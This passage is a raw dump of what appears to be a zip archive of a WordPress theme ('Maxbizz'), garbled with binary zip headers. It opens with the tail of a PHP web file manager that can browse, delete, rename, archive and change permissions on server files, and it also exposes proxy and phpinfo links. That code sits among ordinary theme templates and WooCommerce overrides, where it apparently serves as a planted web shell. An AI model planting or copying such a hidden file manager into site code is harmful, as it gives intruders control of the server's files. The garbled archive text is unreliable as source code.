        $link = '<a href="'.$url_inc.'&path='.$path.$file.'" title="'.__('Show').' '.$file.'"><span class="folder">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
        $loadlink= (fm_root($file)||$phar_maybe) ? '' : fm_link('zip',$filename,__('Compress').'&nbsp;zip',__('Archiving').' '. $file);
		$arlink  = (fm_root($file)||$phar_maybe) ? '' : fm_link('gz',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '.$file);
        $style = 'row2';
		 if (!fm_root($file)) $alert = 'onClick="if(confirm(\'' . __('Are you sure you want to delete this directory (recursively)?').'\n /'. $file. '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"'; else $alert = '';
    } else {
		$link = 
			$fm_config['show_img']&&@getimagesize($filename) 
			? '<a target="_blank" onclick="var lefto = screen.availWidth/2-320;window.open(\''
			. fm_img_link($filename)
			.'\',\'popup\',\'width=640,height=480,left=\' + lefto + \',scrollbars=yes,toolbar=no,location=no,directories=no,status=no\');return false;" href="'.fm_img_link($filename).'"><span class="img">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>'
			: '<a href="' . $url_inc . '&edit=' . $file . '&path=' . $path. '" title="' . __('Edit') . '"><span class="file">&nbsp;&nbsp;&nbsp;&nbsp;</span> '.$file.'</a>';
		$e_arr = explode(".", $file);
		$ext = end($e_arr);
        $loadlink =  fm_link('download',$filename,__('Download'),__('Download').' '. $file);
		$arlink = in_array($ext,array('zip','gz','tar')) 
		? ''
		: ((fm_root($file)||$phar_maybe) ? '' : fm_link('gzfile',$filename,__('Compress').'&nbsp;.tar.gz',__('Archiving').' '. $file));
        $style = 'row1';
		$alert = 'onClick="if(confirm(\''. __('File selected').': \n'. $file. '. \n'.__('Are you sure you want to delete this file?') . '\')) document.location.href = \'' . $url_inc . '&delete=' . $file . '&path=' . $path  . '\'"';
    }
    $deletelink = fm_root($file) ? '' : '<a href="#" title="' . __('Delete') . ' '. $file . '" ' . $alert . '>' . __('Delete') . '</a>';
    $renamelink = fm_root($file) ? '' : '<a href="' . $url_inc . '&rename=' . $file . '&path=' . $path . '" title="' . __('Rename') .' '. $file . '">' . __('Rename') . '</a>';
    $rightstext = ($file=='.' || $file=='..') ? '' : '<a href="' . $url_inc . '&rights=' . $file . '&path=' . $path . '" title="' . __('Rights') .' '. $file . '">' . @fm_rights_string($filename) . '</a>';
?>
<tr class="<?=$style?>"> 
    <td><?=$link?></td>
    <td><?=$filedata[7]?></td>
    <td style="white-space:nowrap"><?=gmdate("Y-m-d H:i:s",$filedata[9])?></td>
    <td><?=$rightstext?></td>
    <td><?=$deletelink?></td>
    <td><?=$renamelink?></td>
    <td><?=$loadlink?></td>
    <td><?=$arlink?></td>
</tr>
<?php
    }
}
?>
</tbody>
</table>
<div class="row3"><?php
	$mtime = explode(' ', microtime()); 
	$totaltime = $mtime[0] + $mtime[1] - $starttime; 
	echo fm_home().' | ver. '.$fm_version.' | <a href="https://github.com/Den1xxx/Filemanager">Github</a>  | <a href="'.fm_site_url().'">.</a>';
	if (!empty($fm_config['show_php_ver'])) echo ' | PHP '.phpversion();
	if (!empty($fm_config['show_php_ini'])) echo ' | '.php_ini_loaded_file();
	if (!empty($fm_config['show_gt'])) echo ' | '.__('Generation time').': '.round($totaltime,2);
	if (!empty($fm_config['enable_proxy'])) echo ' | <a href="?proxy=true">proxy</a>';
	if (!empty($fm_config['show_phpinfo'])) echo ' | <a href="?phpinfo=true">phpinfo</a>';
	if (!empty($fm_config['show_xls'])&&!empty($link)) echo ' | <a href="javascript: void(0)" onclick="var obj = new table2Excel(); obj.CreateExcelSheet(\'fm_table\',\'export\');" title="'.__('Download').' xls">xls</a>';
	if (!empty($fm_config['fm_settings'])) echo ' | <a href="?fm_settings=true">'.__('Settings').'</a>';
	?>
</div>
<script type="text/javascript">
function download_xls(filename, text) {
	var element = document.createElement('a');
	element.setAttribute('href', 'data:application/vnd.ms-excel;base64,' + text);
	element.setAttribute('download', filename);
	element.style.display = 'none';
	document.body.appendChild(element);
	element.click();
	document.body.removeChild(element);
}

function base64_encode(m) {
	for (var k = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/".split(""), c, d, h, e, a, g = "", b = 0, f, l = 0; l < m.length; ++l) {
		c = m.charCodeAt(l);
		if (128 > c) d = 1;
		else
			for (d = 2; c >= 2 << 5 * d;) ++d;
		for (h = 0; h < d; ++h) 1 == d ? e = c : (e = h ? 128 : 192, a = d - 2 - 6 * h, 0 <= a && (e += (6 <= a ? 1 : 0) + (5 <= a ? 2 : 0) + (4 <= a ? 4 : 0) + (3 <= a ? 8 : 0) + (2 <= a ? 16 : 0) + (1 <= a ? 32 : 0), a -= 5), 0 > a && (u = 6 * (d - 1 - h), e += c >> u, c -= c >> u << u)), f = b ? f << 6 - b : 0, b += 2, f += e >> b, g += k[f], f = e % (1 << b), 6 == b && (b = 0, g += k[f])
	}
	b && (g += k[f << 6 - b]);
	return g
}


var tableToExcelData = (function() {
    var uri = 'data:application/vnd.ms-excel;base64,',
    template = '<html xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:x="urn:schemas-microsoft-com:office:excel" xmlns="http://www.w3.org/TR/REC-html40"><head><!--[if gte mso 9]><xml><x:ExcelWorkbook><x:ExcelWorksheets><x:ExcelWorksheet><x:Name>{worksheet}</x:Name><x:WorksheetOptions><x:DisplayGridlines></x:DisplayGridlines></x:WorksheetOptions></x:ExcelWorksheet></x:ExcelWorksheets></x:ExcelWorkbook></xml><![endif]--><meta http-equiv="content-type" content="text/plain; charset=UTF-8"/></head><body><table>{table}</table></body></html>',
    format = function(s, c) {
            return s.replace(/{(\w+)}/g, function(m, p) {
                return c[p];
            })
        }
    return function(table, name) {
        if (!table.nodeType) table = document.getElementById(table)
        var ctx = {
            worksheet: name || 'Worksheet',
            table: table.innerHTML.replace(/<span(.*?)\/span> /g,"").replace(/<a\b[^>]*>(.*?)<\/a>/g,"$1")
        }
		t = new Date();
		filename = 'fm_' + t.toISOString() + '.xls'
		download_xls(filename, base64_encode(format(template, ctx)))
    }
})();

var table2Excel = function () {

    var ua = window.navigator.userAgent;
    var msie = ua.indexOf("MSIE ");

	this.CreateExcelSheet = 
		function(el, name){
			if (msie > 0 || !!navigator.userAgent.match(/Trident.*rv\:11\./)) {// If Internet Explorer

				var x = document.getElementById(el).rows;

				var xls = new ActiveXObject("Excel.Application");

				xls.visible = true;
				xls.Workbooks.Add
				for (i = 0; i < x.length; i++) {
					var y = x[i].cells;

					for (j = 0; j < y.length; j++) {
						xls.Cells(i + 1, j + 1).Value = y[j].innerText;
					}
				}
				xls.Visible = true;
				xls.UserControl = true;
				return xls;
			} else {
				tableToExcelData(el, name);
			}
		}
}
</script>
</body>
</html>

<?php
//Ported from ReloadCMS project http://reloadcms.com
class archiveTar {
	var $archive_name = '';
	var $tmp_file = 0;
	var $file_pos = 0;
	var $isGzipped = true;
	var $errors = array();
	var $files = array();
	
	function __construct(){
		if (!isset($this->errors)) $this->errors = array();
	}
	
	function createArchive($file_list){
		$result = false;
		if (file_exists($this->archive_name) && is_file($this->archive_name)) 	$newArchive = false;
		else $newArchive = true;
		if ($newArchive){
			if (!$this->openWrite()) return false;
		} else {
			if (filesize($this->archive_name) == 0)	return $this->openWrite();
			if ($this->isGzipped) {
				$this->closeTmpFile();
				if (!rename($this->archive_name, $this->archive_name.'.tmp')){
					$this->errors[] = __('Cannot rename').' '.$this->archive_name.__(' to ').$this->archive_name.'.tmp';
					return false;
				}
				$tmpArchive = gzopen($this->archive_name.'.tmp', 'rb');
				if (!$tmpArchive){
					$this->errors[] = $this->archive_name.'.tmp '.__('is not readable');
					rename($this->archive_name.'.tmp', $this->archive_name);
					return false;
				}
				if (!$this->openWrite()){
					rename($this->archive_name.'.tmp', $this->archive_name);
					return false;
				}
				$buffer = gzread($tmpArchive, 512);
				if (!gzeof($tmpArchive)){
					do {
						$binaryData = pack('a512', $buffer);
						$this->writeBlock($binaryData);
						$buffer = gzread($tmpArchive, 512);
					}
					while (!gzeof($tmpArchive));
				}
				gzclose($tmpArchive);
				unlink($this->archive_name.'.tmp');
			} else {
				$this->tmp_file = fopen($this->archive_name, 'r+b');
				if (!$this->tmp_file)	return false;
			}
		}
		if (isset($file_list) && is_array($file_list)) {
		if (count($file_list)>0)
			$result = $this->packFileArray($file_list);
		} else $this->errors[] = __('No file').__(' to ').__('Archive');
		if (($result)&&(is_resource($this->tmp_file))){
			$binaryData = pack('a512', '');
			$this->writeBlock($binaryData);
		}
		$this->closeTmpFile();
		if ($newArchive && !$result){
		$this->closeTmpFile();
		unlink($this->archive_name);
		}
		return $result;
	}

	function restoreArchive($path){
		$fileName = $this->archive_name;
		if (!$this->isGzipped){
			if (file_exists($fileName)){
				if ($fp = fopen($fileName, 'rb')){
					$data = fread($fp, 2);
					fclose($fp);
					if ($data == '\37\213'){
						$this->isGzipped = true;
					}
				}
			}
			elseif ((substr($fileName, -2) == 'gz') OR (substr($fileName, -3) == 'tgz')) $this->isGzipped = true;
		} 
		$result = true;
		if ($this->isGzipped) $this->tmp_file = gzopen($fileName, 'rb');
		else $this->tmp_file = fopen($fileName, 'rb');
		if (!$this->tmp_file){
			$this->errors[] = $fileName.' '.__('is not readable');
			return false;
		}
		$result = $this->unpackFileArray($path);
			$this->closeTmpFile();
		return $result;
	}

	function showErrors	($message = '') {
		$Errors = $this->errors;
		if(count($Errors)>0) {
		if (!empty($message)) $message = ' ('.$message.')';
			$message = __('Error occurred').$message.': <br/>';
			foreach ($Errors as $value)
				$message .= $value.'<br/>';
			return $message;	
		} else return '';
		
	}
	
	function packFileArray($file_array){
		$result = true;
		if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');
			return false;
		}
		if (!is_array($file_array) || count($file_array)<=0)
          return true;
		for ($i = 0; $i<count($file_array); $i++){
			$filename = $file_array[$i];
			if ($filename == $this->archive_name)
				continue;
			if (strlen($filename)<=0)
				continue;
			if (!file_exists($filename)){
				$this->errors[] = __('No file').' '.$filename;
				continue;
			}
			if (!$this->tmp_file){
			$this->errors[] = __('Invalid file descriptor');
			return false;
			}
		if (strlen($filename)<=0){
			$this->errors[] = __('Filename').' '.__('is incorrect');;
			return false;
		}
		$filename = str_replace('\\', '/', $filename);
		$keep_filename = $this->makeGoodPath($filename);
		if (is_file($filename)){
			if (($file = fopen($filename, 'rb')) == 0){
				$this->errors[] = __('Mode ').__('is incorrect');
			}
				if(($this->file_pos == 0)){
					if(!$this->writeHeader($filename, $keep_filename))
						return false;
				}
				while (($buffer = fread($file, 512)) != ''){
					$binaryData = pack('a512', $buffer);
					$this->writeBlock($binaryData);
				}
			fclose($file);
		}	else $this->writeHeader($filename, $keep_filename);
			if (@is_dir($filename)){
				if (!($handle = opendir($filename))){
					$this->errors[] = __('Error').': '.__('Directory ').$filename.__('is not readable');
					continue;
				}
				while (false !== ($dir = readdir($handle))){
					if ($dir!='.' && $dir!='..'){
						$file_array_tmp = array();
						if ($filename != '.')
							$file_array_tmp[] = $filename.'/'.$dir;
						else
							$file_array_tmp[] = $dir;

						$result = $this->packFileArray($file_array_tmp);
					}
				}
				unset($file_array_tmp);
				unset($dir);
				unset($handle);
			}
		}
		return $result;
	}

	function unpackFileArray($path){ 
		$path = str_replace('\\', '/', $path);
		if ($path == ''	|| (substr($path, 0, 1) != '/' && substr($path, 0, 3) != '../' && !strpos($path, ':')))	$path = './'.$path;
		clearstatcache();
		while (strlen($binaryData = $this->readBlock()) != 0){
			if (!$this->readHeader($binaryData, $header)) return false;
			if ($header['filename'] == '') continue;
			if ($header['typeflag'] == 'L'){			//reading long header
				$filename = '';
				$decr = floor($header['size']/512);
				for ($i = 0; $i < $decr; $i++){
					$content = $this->readBlock();
					$filename .= $content;
				}
				if (($laspiece = $header['size'] % 512) != 0){
					$content = $this->readBlock();
					$filename .= substr($content, 0, $laspiece);
				}
				$binaryData = $this->readBlock();
				if (!$this->readHeader($binaryData, $header)) return false;
				else $header['filename'] = $filename;
				return true;
			}
			if (($path != './') && ($path != '/')){
				while (substr($path, -1) == '/') $path = substr($path, 0, strlen($path)-1);
				if (substr($header['filename'], 0, 1) == '/') $header['filename'] = $path.$header['filename'];
				else $header['filename'] = $path.'/'.$header['filename'];
			}
			
			if (file_exists($header['filename'])){
				if ((@is_dir($header['filename'])) && ($header['typeflag'] == '')){
					$this->errors[] =__('File ').$header['filename'].__(' already exists').__(' as folder');
					return false;
				}
				if ((is_file($header['filename'])) && ($header['typeflag'] == '5')){
					$this->errors[] =__('Cannot create directory').'. '.__('File ').$header['filename'].__(' already exists');
					return false;
				}
				if (!is_writeable($header['filename'])){
					$this->errors[] = __('Cannot write to file').'. '.__('File ').$header['filename'].__(' already exists');
					return false;
				}
			} elseif (($this->dirCheck(($header['typeflag'] == '5' ? $header['filename'] : dirname($header['filename'])))) != 1){
				$this->errors[] = __('Cannot create directory').' '.__(' for ').$header['filename'];
				return false;
			}

			if ($header['typeflag'] == '5'){
				if (!file_exists($header['filename']))		{
					if (!mkdir($header['filename'], 0777))	{
						
						$this->errors[] = __('Cannot create directory').' '.$header['filename'];
						return false;
					} 
				}
			} else {
				if (($destination = fopen($header['filename'], 'wb')) == 0) {
					$this->errors[] = __('Cannot write to file').' '.$header['filename'];
					return false;
				} else {
					$decr = floor($header['size']/512);
					for ($i = 0; $i < $decr; $i++) {
						$content = $this->readBlock();
						fwrite($destination, $content, 512);
					}
					if (($header['size'] % 512) != 0) {
						$content = $this->readBlock();
						fwrite($destination, $content, ($header['size'] % 512));
					}
					fclose($destination);
					touch($header['filename'], $header['time']);
				}
				clearstatcache();
				if (filesize($header['filename']) != $header['size']) {
					$this->errors[] = __('Size of file').' '.$header['filename'].' '.__('is incorrect');
					return false;
				}
			}
			if (($file_dir = dirname($header['filename'])) == $header['filename']) $file_dir = '';
			if ((substr($header['filename'], 0, 1) == '/') && ($file_dir == '')) $file_dir = '/';
			$this->dirs[] = $file_dir;
			$this->files[] = $header['filename'];
	
		}
		return true;
	}

	function dirCheck($dir){
		$parent_dir = dirname($dir);

		if ((@is_dir($dir)) or ($dir == ''))
			return true;

		if (($parent_dir != $dir) and ($parent_dir != '') and (!$this->dirCheck($parent_dir)))
			return false;

		if (!mkdir($dir, 0777)){
			$this->errors[] = __('Cannot create directory').' '.$dir;
			return false;
		}
		return true;
	}

	function readHeader($binaryData, &$header){
		if (strlen($binaryData)==0){
			$header['filename'] = '';
			return true;
		}

		if (strlen($binaryData) != 512){
			$header['filename'] = '';
			$this->__('Invalid block size').': '.strlen($binaryData);
			return false;
		}

		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum+=ord(substr($binaryData, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156; $i < 512; $i++) $checksum+=ord(substr($binaryData, $i, 1));

		$unpack_data = unpack('a100filename/a8mode/a8user_id/a8group_id/a12size/a12time/a8checksum/a1typeflag/a100link/a6magic/a2version/a32uname/a32gname/a8devmajor/a8devminor', $binaryData);

		$header['checksum'] = OctDec(trim($unpack_data['checksum']));
		if ($header['checksum'] != $checksum){
			$header['filename'] = '';
			if (($checksum == 256) && ($header['checksum'] == 0)) 	return true;
			$this->errors[] = __('Error checksum for file ').$unpack_data['filename'];
			return false;
		}

		if (($header['typeflag'] = $unpack_data['typeflag']) == '5')	$header['size'] = 0;
		$header['filename'] = trim($unpack_data['filename']);
		$header['mode'] = OctDec(trim($unpack_data['mode']));
		$header['user_id'] = OctDec(trim($unpack_data['user_id']));
		$header['group_id'] = OctDec(trim($unpack_data['group_id']));
		$header['size'] = OctDec(trim($unpack_data['size']));
		$header['time'] = OctDec(trim($unpack_data['time']));
		return true;
	}

	function writeHeader($filename, $keep_filename){
		$packF = 'a100a8a8a8a12A12';
		$packL = 'a1a100a6a2a32a32a8a8a155a12';
		if (strlen($keep_filename)<=0) $keep_filename = $filename;
		$filename_ready = $this->makeGoodPath($keep_filename);

		if (strlen($filename_ready) > 99){							//write long header
		$dataFirst = pack($packF, '././LongLink', 0, 0, 0, sprintf('%11s ', DecOct(strlen($filename_ready))), 0);
		$dataLast = pack($packL, 'L', '', '', '', '', '', '', '', '', '');

        //  Calculate the checksum
		$checksum = 0;
        //  First part of the header
		for ($i = 0; $i < 148; $i++)
			$checksum += ord(substr($dataFirst, $i, 1));
        //  Ignore the checksum value and replace it by ' ' (space)
		for ($i = 148; $i < 156; $i++)
			$checksum += ord(' ');
        //  Last part of the header
		for ($i = 156, $j=0; $i < 512; $i++, $j++)
			$checksum += ord(substr($dataLast, $j, 1));
        //  Write the first 148 bytes of the header in the archive
		$this->writeBlock($dataFirst, 148);
        //  Write the calculated checksum
		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeBlock($binaryData, 8);
        //  Write the last 356 bytes of the header in the archive
		$this->writeBlock($dataLast, 356);

		$tmp_filename = $this->makeGoodPath($filename_ready);

		$i = 0;
			while (($buffer = substr($tmp_filename, (($i++)*512), 512)) != ''){
				$binaryData = pack('a512', $buffer);
				$this->writeBlock($binaryData);
			}
		return true;
		}
		$file_info = stat($filename);
		if (@is_dir($filename)){
			$typeflag = '5';
			$size = sprintf('%11s ', DecOct(0));
		} else {
			$typeflag = '';
			clearstatcache();
			$size = sprintf('%11s ', DecOct(filesize($filename)));
		}
		$dataFirst = pack($packF, $filename_ready, sprintf('%6s ', DecOct(fileperms($filename))), sprintf('%6s ', DecOct($file_info[4])), sprintf('%6s ', DecOct($file_info[5])), $size, sprintf('%11s', DecOct(filemtime($filename))));
		$dataLast = pack($packL, $typeflag, '', '', '', '', '', '', '', '', '');
		$checksum = 0;
		for ($i = 0; $i < 148; $i++) $checksum += ord(substr($dataFirst, $i, 1));
		for ($i = 148; $i < 156; $i++) $checksum += ord(' ');
		for ($i = 156, $j = 0; $i < 512; $i++, $j++) $checksum += ord(substr($dataLast, $j, 1));
		$this->writeBlock($dataFirst, 148);
		$checksum = sprintf('%6s ', DecOct($checksum));
		$binaryData = pack('a8', $checksum);
		$this->writeBlock($binaryData, 8);
		$this->writeBlock($dataLast, 356);
		return true;
	}

	function openWrite(){
		if ($this->isGzipped)
			$this->tmp_file = gzopen($this->archive_name, 'wb9f');
		else
			$this->tmp_file = fopen($this->archive_name, 'wb');

		if (!($this->tmp_file)){
			$this->errors[] = __('Cannot write to file').' '.$this->archive_name;
			return false;
		}
		return true;
	}

	function readBlock(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				$block = gzread($this->tmp_file, 512);
			else
				$block = fread($this->tmp_file, 512);
		} else	$block = '';

		return $block;
	}

	function writeBlock($data, $length = 0){
		if (is_resource($this->tmp_file)){
		
			if ($length === 0){
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data);
				else
					fputs($this->tmp_file, $data);
			} else {
				if ($this->isGzipped)
					gzputs($this->tmp_file, $data, $length);
				else
					fputs($this->tmp_file, $data, $length);
			}
		}
	}

	function closeTmpFile(){
		if (is_resource($this->tmp_file)){
			if ($this->isGzipped)
				gzclose($this->tmp_file);
			else
				fclose($this->tmp_file);

			$this->tmp_file = 0;
		}
	}

	function makeGoodPath($path){
		if (strlen($path)>0){
			$path = str_replace('\\', '/', $path);
			$partPath = explode('/', $path);
			$els = count($partPath)-1;
			for ($i = $els; $i>=0; $i--){
				if ($partPath[$i] == '.'){
                    //  Ignore this directory
                } elseif ($partPath[$i] == '..'){
                    $i--;
                }
				elseif (($partPath[$i] == '') and ($i!=$els) and ($i!=0)){
                }	else
					$result = $partPath[$i].($i!=$els ? '/'.$result : '');
			}
		} else $result = '';
		
		return $result;
	}
}
PK�8FZ�C'���rtl.cssnu�[���/*
Theme Name: THEME_NAME_UPPERCASE

Adding support for languages written in a Right To Left (RTL) direction is easy -
it's just a matter of overwriting all the horizontal positioning attributes
of your CSS stylesheet in a separate stylesheet file named rtl.css.

https://codex.wordpress.org/Right-to-Left_Language_Support

*/

/*
body {
	direction: rtl;
	unicode-bidi: embed;
}
*/
PK�8FZ�"
taxonomy-portfolio_cat.phpnu�[���<?php
/**
 * The template for displaying archive portfolio pages
 *
 * @link https://developer.wordpress.org/themes/basics/template-hierarchy/
 *
 * @package Maxbizz
 */

get_header(); ?>

<div class="entry-content">
	<div class="container">
		<div class="row">
			<div id="primary" class="content-area col-md-12">
				<main id="main" class="site-main">
					<div class="project-filter-wrapper">
						<?php $p_count = wp_count_posts('ot_portfolio'); $c = $p_count->publish; if ( have_posts() ) : ?>
							<div id="projects-grid" class="projects-grid img-scale <?php maxbizz_portfolio_option_class(); ?>" data-load="3" data-count="<?php echo esc_attr($c); ?>">
								<div class="grid-sizer"></div>
								<?php
									/* Start the Loop */
									while ( have_posts() ) : the_post();

										/*
										* Include the Post-Type-specific template for the content.
										* If you want to override this in a child theme, then include a file
										* called content-___.php (where ___ is the Post Type name) and that will be used instead.
										*/
										get_template_part( 'template-parts/content', 'project' );

									endwhile; 
								?>
							</div>
							<div class="pagination-wrapper">
								<?php maxbizz_posts_navigation(); ?>
							</div>
						<?php 	
						else :

							get_template_part( 'template-parts/content', 'none' );

						endif;
						?>			
					</div>		
				</main><!-- #main -->
			</div><!-- #primary -->
		</div>
	</div>
</div>

<?php
get_footer();

PK�8FZt�}	woocommerce/global/sidebar.phpnu�[���<?php
/**
 * Sidebar
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/global/sidebar.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see 	    https://docs.woocommerce.com/document/template-structure/
 * @package 	WooCommerce/Templates
 * @version     6.6.4
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly
}

if ( maxbizz_get_shop_layout() === 'full-content' ) {
	return;
}

$sidebar = 'shop-sidebar';

if ( ! is_active_sidebar( $sidebar ) ) {
	return;
}
?>

<aside id="primary-sidebar" class="shop-sidebar widget-area col-lg-3 col-md-3 col-sm-12 col-xs-12">
	<?php dynamic_sidebar( $sidebar ); ?>
</aside><!-- #secondary -->

PK�8FZ�څ�KKwoocommerce/single-product.phpnu�[���<?php
/**
 * The Template for displaying all single products
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/single-product.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see 	    https://docs.woocommerce.com/document/template-structure/
 * @package 	WooCommerce/Templates
 * @version     6.6.4
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit; // Exit if accessed directly
}

get_header( 'shop' ); ?>
<div class="content-product-wrapper">
	<div class="container">
		<div class="row">
			<?php
				/**
				 * woocommerce_before_main_content hook.
				 *
				 * @hooked woocommerce_output_content_wrapper - 10 (outputs opening divs for the content)
				 * @hooked woocommerce_breadcrumb - 20
				 */
				do_action( 'woocommerce_before_main_content' );
			?>

				<?php while ( have_posts() ) : the_post(); ?>

					<?php wc_get_template_part( 'content', 'single-product' ); ?>

				<?php endwhile; // end of the loop. ?>

			<?php
				/**
				 * woocommerce_after_main_content hook.
				 *
				 * @hooked woocommerce_output_content_wrapper_end - 10 (outputs closing divs for the content)
				 */
				do_action( 'woocommerce_after_main_content' );
			?>

			<?php
				/**
				 * woocommerce_sidebar hook.
				 *
				 * @hooked woocommerce_get_sidebar - 10
				 */
				do_action( 'woocommerce_sidebar' );
			?>
		</div>
	</div>
</div>
<?php get_footer( 'shop' );

/* Omit closing PHP tag at the end of PHP files to avoid "headers already sent" issues. */
PK�8FZ�ww�� woocommerce/loop/add-to-cart.phpnu�[���<?php
/**
 * Loop Add to Cart
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/loop/add-to-cart.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see 	    https://docs.woocommerce.com/document/template-structure/
 * @package 	WooCommerce/Templates
 * @version     6.3.0
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

global $product;

echo apply_filters( 'woocommerce_loop_add_to_cart_link', // WPCS: XSS ok.
	sprintf( '<a href="%s" data-quantity="%s" class="%s octf-btn octf-btn-primary" %s>%s </a>',
		esc_url( $product->add_to_cart_url() ),
		esc_attr( isset( $args['quantity'] ) ? $args['quantity'] : 1 ),
		esc_attr( isset( $args['class'] ) ? $args['class'] : 'button' ),
		isset( $args['attributes'] ) ? wc_implode_html_attributes( $args['attributes'] ) : '',
		esc_html( $product->add_to_cart_text() )
	),
$product, $args );
PK�8FZ��0woocommerce/loop/pagination.phpnu�[���<?php
/**
 * Pagination - Show numbered pagination for catalog pages
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/loop/pagination.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see     https://docs.woocommerce.com/document/template-structure/
 * @package WooCommerce/Templates
 * @version 6.3.1
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

$total   = isset( $total ) ? $total : wc_get_loop_prop( 'total_pages' );
$current = isset( $current ) ? $current : wc_get_loop_prop( 'current_page' );
$base    = isset( $base ) ? $base : esc_url_raw( str_replace( 999999999, '%#%', remove_query_arg( 'add-to-cart', get_pagenum_link( 999999999, false ) ) ) );
$format  = isset( $format ) ? $format : '';

if ( $total <= 1 ) {
	return;
}
?>
<nav class="wc-pagination">
	<?php
		$pagination = array( // WPCS: XSS ok.
			'base'         => $base,
			'format'       => $format,
			'add_args'     => false,
			'current'      => max( 1, $current ),
			'total'        => $total,
			'prev_text'    => '<i class="ot-flaticon-arrow-pointing-to-left"></i>',
			'next_text'    => '<i class="ot-flaticon-arrowsoutline"></i>',
			'type'         => 'list',
			'end_size'     => 3,
			'mid_size'     => 3,
		);
		$return =  paginate_links( apply_filters( 'woocommerce_pagination_args', $pagination ) );
        echo str_replace( "<ul class='page-numbers'>", '<ul class="page-pagination">', $return );
	?>
</nav>
PK�8FZY�����woocommerce/content-product.phpnu�[���<?php
/**
 * The template for displaying product content within loops
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/content-product.php.
 *
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see     https://docs.woocommerce.com/document/template-structure/
 * @package WooCommerce/Templates
 * @version 6.6.0
 */

defined( 'ABSPATH' ) || exit;

global $product;

// Ensure visibility.
if ( empty( $product ) || ! $product->is_visible() ) {
	return;
}
?>
<li <?php wc_product_class( '', $product ); ?>>
	<?php
	/**
	 * Hook: woocommerce_before_shop_loop_item.
	 *
	 * @hooked woocommerce_template_loop_product_link_open - 10
	 */
	do_action( 'woocommerce_before_shop_loop_item' );
	?>

	<div class="product-media">	
		<a href="<?php the_permalink(); ?>" title="<?php the_title_attribute(); ?>">
		<?php
		/**
		 * Hook: woocommerce_before_shop_loop_item_title.
		 *
		 * @hooked woocommerce_show_product_loop_sale_flash - 10
		 * @hooked woocommerce_template_loop_product_thumbnail - 10
		 */
		do_action( 'woocommerce_before_shop_loop_item_title' );
		?>
		</a>
		<div class="wrapper-add-to-cart">
			<div class="add-to-cart-inner">
				<?php
				/**
				 * Hook: woocommerce_after_shop_loop_item.
				 *
				 * @hooked woocommerce_template_loop_product_link_close - 5
				 * @hooked woocommerce_template_loop_add_to_cart - 10
				 */
				do_action( 'woocommerce_after_shop_loop_item' );
				?>			
			</div>
		</div>
	</div>

	<?php
	/**
	 * Hook: woocommerce_shop_loop_item_title.
	 *
	 * @hooked woocommerce_template_loop_product_title - 10
	 */
	do_action( 'woocommerce_shop_loop_item_title' );

	/**
	 * Hook: woocommerce_after_shop_loop_item_title.
	 *
	 * @hooked woocommerce_template_loop_rating - 5
	 * @hooked woocommerce_template_loop_price - 10
	 */
	do_action( 'woocommerce_after_shop_loop_item_title' );
	
	?>
</li>
PK�8FZ>�,x��&woocommerce/content-widget-product.phpnu�[���<?php
/**
 * The template for displaying product widget entries.
 *
 * This template can be overridden by copying it to yourtheme/woocommerce/content-widget-product.php.
 * HOWEVER, on occasion WooCommerce will need to update template files and you
 * (the theme developer) will need to copy the new files to your theme to
 * maintain compatibility. We try to do this as little as possible, but it does
 * happen. When this occurs the version of the template file will be bumped and
 * the readme will list any important changes.
 *
 * @see     https://docs.woocommerce.com/document/template-structure/
 * @package WooCommerce/Templates
 * @version 6.5.5
 */

if ( ! defined( 'ABSPATH' ) ) {
	exit;
}

global $product;

if ( ! is_a( $product, 'WC_Product' ) ) {
	return;
}

?>
<li>
	<?php do_action( 'woocommerce_widget_product_item_start', $args ); ?>
	<div class="widget-prthumb">
		<a href="<?php echo esc_url( $product->get_permalink() ); ?>">
			<?php echo $product->get_image(); // PHPCS:Ignore WordPress.Security.EscapeOutput.OutputNotEscaped ?>		
		</a>
	</div>
	
	<div class="widget-prcontent">		
		<span class="product-title"><a href="<?php echo esc_url( $product->get_permalink() ); ?>"><?php echo wp_kses_post( $product->get_name() ); ?></a></span>
		
		<?php if ( ! empty( $show_rating ) ) : ?>
